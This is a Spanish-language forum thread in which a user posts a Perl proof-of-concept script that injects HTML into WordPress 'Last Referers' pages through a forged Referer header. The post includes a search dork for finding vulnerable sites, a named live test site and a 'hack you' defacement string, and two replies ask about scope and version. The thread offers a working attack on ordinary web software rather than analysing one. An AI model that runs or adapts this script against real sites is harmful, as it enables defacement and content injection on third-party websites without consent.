Título: WordPress Last Referers HTML INJECTION Proof of Concept
Publicado por: ZoneMx en 23 Enero 2008, 07:08 am
Saludos pues aqui les dejo esto lo he estado probando y funciona codigo en perl, sigo investigando.... ;D #/usr/bin/perl #zONEm mXC gEN #perl test to insert html code to WordPress Last referers #Worpress: Dork:Is proudly powered by Wordpress last referers #test with http://nerra.com/broadsword/
use strict; use warnings; use LWP;
my $wordweb=shift or help(); my $agente = LWP::UserAgent->new; my $request = HTTP::Request->new(GET => $wordweb); my ($response,$referer);
banner(); $referer=" '<img src='http://youserver/yourimage.png'>"; $request->referer($referer); $response=$agente->request($request); $response->is_success or die "$wordweb : ",$response->message,"\n"; $referer=" zoneM MxC hack you.."; $request->referer($referer); $response=$agente->request($request); $response->is_success or die "$wordweb : ",$response->message,"\n"; print "\nAhora se debe ver la imagen insertada en Last Referers\n"; print "\nMxC Gen Test\n"; sub banner{ print "test to INJECT html code to Last Referers in Wordpress"; } sub help{ print "HTML LAST REFERERS WORDPRESS INJECTOR\n"; print "PROOF OF CONCEPT\n"; print "Proof by: ZoneM MxC Gen\n\n"; print "UsO:\n"; print "\tperl injeccion.pl [url]\n"; print "\t[url]-WordPress Site \n"; print "Example:\n"; print "\tperl injeccion.pl http://sitiowordpress.org/\n"; exit(0); }
Título: Re: WordPress Last Referers HTML INJECTION Proof of Concept
Publicado por: -sagitari- en 26 Enero 2008, 14:28 pm
Por lo que veo en el code, si no me equivoco , el código que inyectas en la web del wordpress es clientside, ¿no?...
salu2
Título: Re: WordPress Last Referers HTML INJECTION Proof of Concept
Publicado por: 6666 en 28 Enero 2008, 14:37 pm
la verdad que si funciona!..pero que version? más datos exactamente.
|